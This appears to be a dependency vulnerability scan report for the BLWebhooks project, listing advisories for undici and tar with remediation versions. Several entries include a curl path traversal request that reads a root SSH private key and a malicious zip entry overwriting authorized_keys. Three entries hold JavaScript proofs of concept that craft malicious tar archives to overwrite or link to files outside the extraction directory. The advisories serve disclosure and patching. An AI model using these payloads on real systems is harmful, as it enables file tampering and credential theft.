Vulnerabilities

12 via 58 paths

Dependencies

178

Source

GitHub

Commit

8ca9edef

Find, fix and prevent vulnerabilities in your code.

Severity
  • 6
  • 6
Status
  • 12
  • 0
  • 0

high severity
new

Improper Handling of Highly Compressed Data (Data Amplification)

  • Vulnerable module: undici
  • Introduced through: @top-gg/sdk@3.1.6, blwebhooks@3.5.11 and others

Detailed paths

  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 @top-gg/sdk@3.1.6 undici@5.29.0
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 blwebhooks@3.5.11 @top-gg/sdk@3.1.6 undici@5.29.0
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 discord.js@14.25.1 undici@6.21.3
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 discord.js@14.25.1 @discordjs/rest@2.6.0 undici@6.21.3
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 blwebhooks@3.5.11 discord.js@14.25.1 undici@6.21.3
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 discord.js@14.25.1 @discordjs/ws@1.2.3 @discordjs/rest@2.6.0 undici@6.21.3
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 blwebhooks@3.5.11 discord.js@14.25.1 @discordjs/rest@2.6.0 undici@6.21.3
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 blwebhooks@3.5.11 discord.js@14.25.1 @discordjs/ws@1.2.3 @discordjs/rest@2.6.0 undici@6.21.3

Overview

undici is an An HTTP/1.1 client, written from scratch for Node.js

Affected versions of this package are vulnerable to Improper Handling of Highly Compressed Data (Data Amplification) in the PerMessageDeflate.decompress() method of the permessage-deflate extension. An attacker can cause excessive memory usage by sending specially crafted compressed WebSocket frames that decompress to a very large size, potentially leading to process crashes or unresponsiveness.

Remediation

Upgrade undici to version 6.24.0, 7.24.0 or higher.

References

high severity
new

Uncaught Exception

  • Vulnerable module: undici
  • Introduced through: discord.js@14.25.1 and blwebhooks@3.5.11

Detailed paths

  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 discord.js@14.25.1 undici@6.21.3
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 discord.js@14.25.1 @discordjs/rest@2.6.0 undici@6.21.3
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 blwebhooks@3.5.11 discord.js@14.25.1 undici@6.21.3
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 discord.js@14.25.1 @discordjs/ws@1.2.3 @discordjs/rest@2.6.0 undici@6.21.3
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 blwebhooks@3.5.11 discord.js@14.25.1 @discordjs/rest@2.6.0 undici@6.21.3
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 blwebhooks@3.5.11 discord.js@14.25.1 @discordjs/ws@1.2.3 @discordjs/rest@2.6.0 undici@6.21.3

Overview

undici is an An HTTP/1.1 client, written from scratch for Node.js

Affected versions of this package are vulnerable to Uncaught Exception in the ByteParser when handling a specially crafted WebSocket frame with an extremely large 64-bit length. An attacker can cause the process to terminate unexpectedly by sending such a frame, resulting in a fatal TypeError and service disruption.

Remediation

Upgrade undici to version 6.24.0, 7.24.0 or higher.

References

high severity
new

Uncaught Exception

  • Vulnerable module: undici
  • Introduced through: @top-gg/sdk@3.1.6, blwebhooks@3.5.11 and others

Detailed paths

  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 @top-gg/sdk@3.1.6 undici@5.29.0
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 blwebhooks@3.5.11 @top-gg/sdk@3.1.6 undici@5.29.0
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 discord.js@14.25.1 undici@6.21.3
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 discord.js@14.25.1 @discordjs/rest@2.6.0 undici@6.21.3
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 blwebhooks@3.5.11 discord.js@14.25.1 undici@6.21.3
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 discord.js@14.25.1 @discordjs/ws@1.2.3 @discordjs/rest@2.6.0 undici@6.21.3
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 blwebhooks@3.5.11 discord.js@14.25.1 @discordjs/rest@2.6.0 undici@6.21.3
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 blwebhooks@3.5.11 discord.js@14.25.1 @discordjs/ws@1.2.3 @discordjs/rest@2.6.0 undici@6.21.3

Overview

undici is an An HTTP/1.1 client, written from scratch for Node.js

Affected versions of this package are vulnerable to Uncaught Exception through improper validation of the server_max_window_bits parameter in the permessage-deflate extension. An attacker can cause the process to terminate unexpectedly by sending a maliciously crafted value outside the valid range, which triggers an unhandled exception when the client attempts to create a zlib InflateRaw instance.

Remediation

Upgrade undici to version 6.24.0, 7.24.0 or higher.

References

high severity
new

Directory Traversal

  • Vulnerable module: tar
  • Introduced through: sqlite3@5.1.7 and blwebhooks@3.5.11

Detailed paths

  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 sqlite3@5.1.7 tar@6.2.1
    Remediation: Upgrade to sqlite3@6.0.1.
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 blwebhooks@3.5.11 sqlite3@5.1.7 tar@6.2.1

Overview

tar is a full-featured Tar for Node.js.

Affected versions of this package are vulnerable to Directory Traversal via the extract() function. An attacker can read or write files outside the intended extraction directory by causing the application to extract a malicious archive containing a chain of symlinks leading to a hardlink, which bypasses path validation checks.

Details

A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.

Directory Traversal vulnerabilities can be generally divided into two types:

  • Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.

st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.

If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.

curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa

Note %2e is the URL encoded version of . (dot).

  • Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.

One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:

2018-04-15 22:04:29 .....           19           19  good.txt
2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys

Remediation

Upgrade tar to version 7.5.8 or higher.

References

high severity
new

Symlink Attack

  • Vulnerable module: tar
  • Introduced through: sqlite3@5.1.7 and blwebhooks@3.5.11

Detailed paths

  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 sqlite3@5.1.7 tar@6.2.1
    Remediation: Upgrade to sqlite3@6.0.1.
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 blwebhooks@3.5.11 sqlite3@5.1.7 tar@6.2.1

Overview

tar is a full-featured Tar for Node.js.

Affected versions of this package are vulnerable to Symlink Attack exploitable via stripAbsolutePath(), used by the Unpack class. An attacker can overwrite arbitrary files outside the intended extraction directory by including a hardlink whose linkpath uses a drive-relative path such as C:../target.txt in a malicious tar.

Details

A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.

Directory Traversal vulnerabilities can be generally divided into two types:

  • Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.

st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.

If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.

curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa

Note %2e is the URL encoded version of . (dot).

  • Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.

One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:

2018-04-15 22:04:29 .....           19           19  good.txt
2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys

Remediation

Upgrade tar to version 7.5.10 or higher.

References

high severity
new

Symlink Attack

  • Vulnerable module: tar
  • Introduced through: sqlite3@5.1.7 and blwebhooks@3.5.11

Detailed paths

  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 sqlite3@5.1.7 tar@6.2.1
    Remediation: Upgrade to sqlite3@6.0.1.
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 blwebhooks@3.5.11 sqlite3@5.1.7 tar@6.2.1

Overview

tar is a full-featured Tar for Node.js.

Affected versions of this package are vulnerable to Symlink Attack via tar.x() extraction, which allows an attacker to overwrite arbitrary files outside the intended extraction directory with a drive-relative symlink target - like C:../../../target.txt.

PoC


const fs = require('fs')
const path = require('path')
const { Header, x } = require('tar')

const cwd = process.cwd()
const target = path.resolve(cwd, '..', 'target.txt')
const tarFile = path.join(cwd, 'poc.tar')

fs.writeFileSync(target, 'ORIGINAL\n')

const b = Buffer.alloc(1536)
new Header({
  path: 'a/b/l',
  type: 'SymbolicLink',
  linkpath: 'C:../../../target.txt',
}).encode(b, 0)
fs.writeFileSync(tarFile, b)

x({ cwd, file: tarFile }).then(() => {
  fs.writeFileSync(path.join(cwd, 'a/b/l'), 'PWNED\n')
  process.stdout.write(fs.readFileSync(target, 'utf8'))
})

Details

A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.

Directory Traversal vulnerabilities can be generally divided into two types:

  • Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.

st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.

If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.

curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa

Note %2e is the URL encoded version of . (dot).

  • Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.

One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:

2018-04-15 22:04:29 .....           19           19  good.txt
2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys

Remediation

Upgrade tar to version 7.5.11 or higher.

References

medium severity
new

HTTP Request Smuggling

  • Vulnerable module: undici
  • Introduced through: @top-gg/sdk@3.1.6, blwebhooks@3.5.11 and others

Detailed paths

  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 @top-gg/sdk@3.1.6 undici@5.29.0
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 blwebhooks@3.5.11 @top-gg/sdk@3.1.6 undici@5.29.0
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 discord.js@14.25.1 undici@6.21.3
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 discord.js@14.25.1 @discordjs/rest@2.6.0 undici@6.21.3
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 blwebhooks@3.5.11 discord.js@14.25.1 undici@6.21.3
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 discord.js@14.25.1 @discordjs/ws@1.2.3 @discordjs/rest@2.6.0 undici@6.21.3
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 blwebhooks@3.5.11 discord.js@14.25.1 @discordjs/rest@2.6.0 undici@6.21.3
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 blwebhooks@3.5.11 discord.js@14.25.1 @discordjs/ws@1.2.3 @discordjs/rest@2.6.0 undici@6.21.3

Overview

undici is an An HTTP/1.1 client, written from scratch for Node.js

Affected versions of this package are vulnerable to HTTP Request Smuggling in the processHeader() while handling HTTP/1.1 requests containing duplicate Content-Length headers with differing casing. An attacker can bypass access controls, poison caches, hijack credentials, or cause service disruption by sending specially crafted HTTP requests that are interpreted inconsistently by proxies and backend servers.

Remediation

Upgrade undici to version 6.24.0, 7.24.0 or higher.

References

medium severity

Improper Handling of Unicode Encoding

  • Vulnerable module: tar
  • Introduced through: sqlite3@5.1.7 and blwebhooks@3.5.11

Detailed paths

  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 sqlite3@5.1.7 tar@6.2.1
    Remediation: Upgrade to sqlite3@6.0.1.
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 blwebhooks@3.5.11 sqlite3@5.1.7 tar@6.2.1

Overview

tar is a full-featured Tar for Node.js.

Affected versions of this package are vulnerable to Improper Handling of Unicode Encoding in Path Reservations via Unicode Sharp-S (ß) Collisions on macOS APFS. An attacker can overwrite arbitrary files by exploiting Unicode normalization collisions in filenames within a malicious tar archive on case-insensitive or normalization-insensitive filesystems.

Note:

This is only exploitable if the system is running on a filesystem such as macOS APFS or HFS+ that ignores Unicode normalization.

Workaround

This vulnerability can be mitigated by filtering out all SymbolicLink entries when extracting tarball data.

PoC

const tar = require('tar');
const fs = require('fs');
const path = require('path');
const { PassThrough } = require('stream');

const exploitDir = path.resolve('race_exploit_dir');
if (fs.existsSync(exploitDir)) fs.rmSync(exploitDir, { recursive: true, force: true });
fs.mkdirSync(exploitDir);

console.log('[*] Testing...');
console.log(`[*] Extraction target: ${exploitDir}`);

// Construct stream
const stream = new PassThrough();

const contentA = 'A'.repeat(1000);
const contentB = 'B'.repeat(1000);

// Key 1: "f_ss"
const header1 = new tar.Header({
    path: 'collision_ss',
    mode: 0o644,
    size: contentA.length,
});
header1.encode();

// Key 2: "f_ß"
const header2 = new tar.Header({
    path: 'collision_ß',
    mode: 0o644,
    size: contentB.length,
});
header2.encode();

// Write to stream
stream.write(header1.block);
stream.write(contentA);
stream.write(Buffer.alloc(512 - (contentA.length % 512))); // Padding

stream.write(header2.block);
stream.write(contentB);
stream.write(Buffer.alloc(512 - (contentB.length % 512))); // Padding

// End
stream.write(Buffer.alloc(1024));
stream.end();

// Extract
const extract = new tar.Unpack({
    cwd: exploitDir,
    // Ensure jobs is high enough to allow parallel processing if locks fail
    jobs: 8 
});

stream.pipe(extract);

extract.on('end', () => {
    console.log('[*] Extraction complete');

    // Check what exists
    const files = fs.readdirSync(exploitDir);
    console.log('[*] Files in exploit dir:', files);
    files.forEach(f => {
        const p = path.join(exploitDir, f);
        const stat = fs.statSync(p);
        const content = fs.readFileSync(p, 'utf8');
        console.log(`File: ${f}, Inode: ${stat.ino}, Content: ${content.substring(0, 10)}... (Length: ${content.length})`);
    });

    if (files.length === 1 || (files.length === 2 && fs.statSync(path.join(exploitDir, files[0])).ino === fs.statSync(path.join(exploitDir, files[1])).ino)) {
        console.log('\[*] GOOD');
    } else {
        console.log('[-] No collision');
    }
});

Remediation

Upgrade tar to version 7.5.4 or higher.

References

medium severity

Directory Traversal

  • Vulnerable module: tar
  • Introduced through: sqlite3@5.1.7 and blwebhooks@3.5.11

Detailed paths

  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 sqlite3@5.1.7 tar@6.2.1
    Remediation: Upgrade to sqlite3@6.0.1.
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 blwebhooks@3.5.11 sqlite3@5.1.7 tar@6.2.1

Overview

tar is a full-featured Tar for Node.js.

Affected versions of this package are vulnerable to Directory Traversal via processing of hardlinks. An attacker can read or overwrite arbitrary files on the file system by crafting a malicious TAR archive that bypasses path traversal protections during extraction.

Details

A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.

Directory Traversal vulnerabilities can be generally divided into two types:

  • Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.

st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.

If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.

curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa

Note %2e is the URL encoded version of . (dot).

  • Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.

One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:

2018-04-15 22:04:29 .....           19           19  good.txt
2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys

Remediation

Upgrade tar to version 7.5.7 or higher.

References

medium severity

Directory Traversal

  • Vulnerable module: tar
  • Introduced through: sqlite3@5.1.7 and blwebhooks@3.5.11

Detailed paths

  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 sqlite3@5.1.7 tar@6.2.1
    Remediation: Upgrade to sqlite3@6.0.1.
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 blwebhooks@3.5.11 sqlite3@5.1.7 tar@6.2.1

Overview

tar is a full-featured Tar for Node.js.

Affected versions of this package are vulnerable to Directory Traversal via insufficient sanitization of the linkpath parameter during archive extraction. An attacker can overwrite arbitrary files or create malicious symbolic links by crafting a tar archive with hardlink or symlink entries that resolve outside the intended extraction directory.

PoC

const fs = require('fs')
const path = require('path')
const tar = require('tar')

const out = path.resolve('out_repro')
const secret = path.resolve('secret.txt')
const tarFile = path.resolve('exploit.tar')
const targetSym = '/etc/passwd'

// Cleanup & Setup
try { fs.rmSync(out, {recursive:true, force:true}); fs.unlinkSync(secret) } catch {}
fs.mkdirSync(out)
fs.writeFileSync(secret, 'ORIGINAL_DATA')

// 1. Craft malicious Link header (Hardlink to absolute local file)
const h1 = new tar.Header({
  path: 'exploit_hard',
  type: 'Link',
  size: 0,
  linkpath: secret 
})
h1.encode()

// 2. Craft malicious Symlink header (Symlink to /etc/passwd)
const h2 = new tar.Header({
  path: 'exploit_sym',
  type: 'SymbolicLink',
  size: 0,
  linkpath: targetSym 
})
h2.encode()

// Write binary tar
fs.writeFileSync(tarFile, Buffer.concat([ h1.block, h2.block, Buffer.alloc(1024) ]))

console.log('[*] Extracting malicious tarball...')

// 3. Extract with default secure settings
tar.x({
  cwd: out,
  file: tarFile,
  preservePaths: false
}).then(() => {
  console.log('[*] Verifying payload...')

  // Test Hardlink Overwrite
  try {
    fs.writeFileSync(path.join(out, 'exploit_hard'), 'OVERWRITTEN')
    
    if (fs.readFileSync(secret, 'utf8') === 'OVERWRITTEN') {
      console.log('[+] VULN CONFIRMED: Hardlink overwrite successful')
    } else {
      console.log('[-] Hardlink failed')
    }
  } catch (e) {}

  // Test Symlink Poisoning
  try {
    if (fs.readlinkSync(path.join(out, 'exploit_sym')) === targetSym) {
      console.log('[+] VULN CONFIRMED: Symlink points to absolute path')
    } else {
      console.log('[-] Symlink failed')
    }
  } catch (e) {}
})

Details

A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.

Directory Traversal vulnerabilities can be generally divided into two types:

  • Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.

st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.

If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.

curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa

Note %2e is the URL encoded version of . (dot).

  • Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.

One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:

2018-04-15 22:04:29 .....           19           19  good.txt
2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys

Remediation

Upgrade tar to version 7.5.3 or higher.

References

medium severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: undici
  • Introduced through: @top-gg/sdk@3.1.6, blwebhooks@3.5.11 and others

Detailed paths

  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 @top-gg/sdk@3.1.6 undici@5.29.0
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 blwebhooks@3.5.11 @top-gg/sdk@3.1.6 undici@5.29.0
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 discord.js@14.25.1 undici@6.21.3
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 discord.js@14.25.1 @discordjs/rest@2.6.0 undici@6.21.3
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 blwebhooks@3.5.11 discord.js@14.25.1 undici@6.21.3
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 discord.js@14.25.1 @discordjs/ws@1.2.3 @discordjs/rest@2.6.0 undici@6.21.3
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 blwebhooks@3.5.11 discord.js@14.25.1 @discordjs/rest@2.6.0 undici@6.21.3
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 blwebhooks@3.5.11 discord.js@14.25.1 @discordjs/ws@1.2.3 @discordjs/rest@2.6.0 undici@6.21.3

Overview

undici is an An HTTP/1.1 client, written from scratch for Node.js

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via the decompression chain. An attacker can cause high CPU usage and excessive memory allocation by sending HTTP responses with a large number of chained compression steps in the Content-Encoding header.

Remediation

Upgrade undici to version 6.23.0, 7.18.2 or higher.

References

medium severity
new

CRLF Injection

  • Vulnerable module: undici
  • Introduced through: @top-gg/sdk@3.1.6, blwebhooks@3.5.11 and others

Detailed paths

  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 @top-gg/sdk@3.1.6 undici@5.29.0
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 blwebhooks@3.5.11 @top-gg/sdk@3.1.6 undici@5.29.0
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 discord.js@14.25.1 undici@6.21.3
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 discord.js@14.25.1 @discordjs/rest@2.6.0 undici@6.21.3
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 blwebhooks@3.5.11 discord.js@14.25.1 undici@6.21.3
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 discord.js@14.25.1 @discordjs/ws@1.2.3 @discordjs/rest@2.6.0 undici@6.21.3
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 blwebhooks@3.5.11 discord.js@14.25.1 @discordjs/rest@2.6.0 undici@6.21.3
  • Introduced through: blwebhooks@Strider-Bot/BLWebhooks#8ca9edefa48a2f0fa4e94da01464fed33d890161 blwebhooks@3.5.11 discord.js@14.25.1 @discordjs/ws@1.2.3 @discordjs/rest@2.6.0 undici@6.21.3

Overview

undici is an An HTTP/1.1 client, written from scratch for Node.js

Affected versions of this package are vulnerable to CRLF Injection via the upgrade option of the client.request() function. An attacker can inject malicious data into HTTP headers or prematurely terminate HTTP requests by sending specially crafted input, potentially leading to unauthorized information disclosure or bypassing of security controls.

Remediation

Upgrade undici to version 6.24.0, 7.24.0 or higher.

References